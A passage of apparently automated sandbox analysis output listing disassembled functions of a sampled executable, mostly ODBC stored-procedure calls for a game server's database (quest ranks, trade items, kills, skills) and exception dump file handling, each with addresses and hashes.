                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433394
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004333CC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433404
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043343C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433474
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004334AC
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertQuestGlobalRank] (?,?,?, ?,?,?)}, xrefs: 00433317
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertQuestGlobalRank] (?,?,?, ?,?,?)}
                                                                                      • API String ID: 0-2729232107
                                                                                      • Opcode ID: 1686c2582f36f0e43bfe29750fe9c37aacbf6da08c739658f92376a276051c8d
                                                                                      • Instruction ID: 7fb5eb461b7cfbaa286827bf7887be231a9518c3a97f5bd23c4ac56598ad9415
                                                                                      • Opcode Fuzzy Hash: 1686c2582f36f0e43bfe29750fe9c37aacbf6da08c739658f92376a276051c8d
                                                                                      • Instruction Fuzzy Hash: 7751EEB1F832147BFB249B54CD62FAA7374EB84B18F1081C9F7186E2C6D5B169408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SetTradeItemToInven] (?,?,?,?,?,?)},000000FD), ref: 004373DD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043741C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00437454
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437489
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004374C1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004374F9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437531
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437569
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SetTradeItemToInven] (?,?,?,?,?,?)}, xrefs: 004373D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SetTradeItemToInven] (?,?,?,?,?,?)}
                                                                                      • API String ID: 0-1211797500
                                                                                      • Opcode ID: e8f4fc95cd7a714954e1684bfe935b95d123ef32ec9b430576c4a969bf5d2791
                                                                                      • Instruction ID: ef81dda098cf6eddae38007f0d1d05adfe5d5a03acd90165103c7735ff97f0aa
                                                                                      • Opcode Fuzzy Hash: e8f4fc95cd7a714954e1684bfe935b95d123ef32ec9b430576c4a969bf5d2791
                                                                                      • Instruction Fuzzy Hash: 2B510DB07402187FFB248B54CC52FAA7234EB85B5CF604388F7556E2C5DAB16980CB19
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertLadderQuestState] (?,?,?, ?,?,?)},000000FD), ref: 00433574
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004335B3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004335E8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433620
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00433658
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00433690
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 004336C8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 00433700
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertLadderQuestState] (?,?,?, ?,?,?)}, xrefs: 0043356B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertLadderQuestState] (?,?,?, ?,?,?)}
                                                                                      • API String ID: 0-3027823149
                                                                                      • Opcode ID: 08b47d768915e68a46dded6a05b5b56425e8508cfad796cbe5576c9fade6e2ae
                                                                                      • Instruction ID: e7035af6969ad55f34fb88c885c34d44d462be9573985d4d696f484ff04c8c46
                                                                                      • Opcode Fuzzy Hash: 08b47d768915e68a46dded6a05b5b56425e8508cfad796cbe5576c9fade6e2ae
                                                                                      • Instruction Fuzzy Hash: 2A510DB16812557BFB20CB54CC52FAA7335EB84B18F10828BF6187E2C6D1B56D80CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetKill] (?, ?, ?, ?, ?, ?)},000000FD), ref: 0042F612
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F651
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F686
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F6BE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F6F6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F72E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F766
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042F79E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetKill] (?, ?, ?, ?, ?, ?)}, xrefs: 0042F609
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetKill] (?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-3457390456
                                                                                      • Opcode ID: 79e9f3f721333abe891ac22e54c857bc273d8733b6002aaddf09a6dbfdbe3cd3
                                                                                      • Instruction ID: c96e6eea6204c3d9f31c2c94ee4bebab52179fc3d7c50b7df5ef464754610fa4
                                                                                      • Opcode Fuzzy Hash: 79e9f3f721333abe891ac22e54c857bc273d8733b6002aaddf09a6dbfdbe3cd3
                                                                                      • Instruction Fuzzy Hash: BD5102B06442157BFB648F54CC52FA97336EBC4B18F21C788F7146E2C5DAB269508B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SaveScrollSkill] (?, ?, ?, ?, ?, ?)},000000FD), ref: 0044072C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044076B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004407A0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004407D8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000004,00000000), ref: 00440810
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00440848
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00440880
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004408B8
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SaveScrollSkill] (?, ?, ?, ?, ?, ?)}, xrefs: 00440723
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SaveScrollSkill] (?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-743286110
                                                                                      • Opcode ID: 399c4b58b168f48e565a8e91b0a09902bb1cbe682cac12e8936b4eba5058337e
                                                                                      • Instruction ID: 2023f678fee52d28e331bb0a14ac9e39b6c518355ee4042fc414191ada448e54
                                                                                      • Opcode Fuzzy Hash: 399c4b58b168f48e565a8e91b0a09902bb1cbe682cac12e8936b4eba5058337e
                                                                                      • Instruction Fuzzy Hash: 085127B06482557BEB249B54CCD2FD97374EB84B18F208388F719BE2C6D7B16D608B58
                                                                                      APIs
                                                                                      • __time32.LIBCMT ref: 0045D0EE
                                                                                      • wsprintfA.USER32 ref: 0045D148
                                                                                      • MoveFileExA.KERNEL32(004E93D0,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0045D15F
                                                                                      • wsprintfA.USER32 ref: 0045D1A5
                                                                                      • MoveFileExA.KERNEL32(004E92C8,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0045D1BC
                                                                                      • DeleteFileA.KERNEL32(004E93D0), ref: 0045D1C7
                                                                                      • DeleteFileA.KERNEL32(004E92C8), ref: 0045D1D2
                                                                                      Strings
                                                                                      • Exception\%02d%02d%02d.%02d%02d%02d.dbg.txt, xrefs: 0045D13C
                                                                                      • Exception\%02d%02d%02d.%02d%02d%02d.dbg.dmp, xrefs: 0045D199
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DeleteMovewsprintf$__time32
                                                                                      • String ID: Exception\%02d%02d%02d.%02d%02d%02d.dbg.dmp$Exception\%02d%02d%02d.%02d%02d%02d.dbg.txt
                                                                                      • API String ID: 3553656915-17688597
                                                                                      • Opcode ID: 1ea704fe1dea27c90056f9c87c2ac954dd751cb994a7194c4c9c64639a5b0988
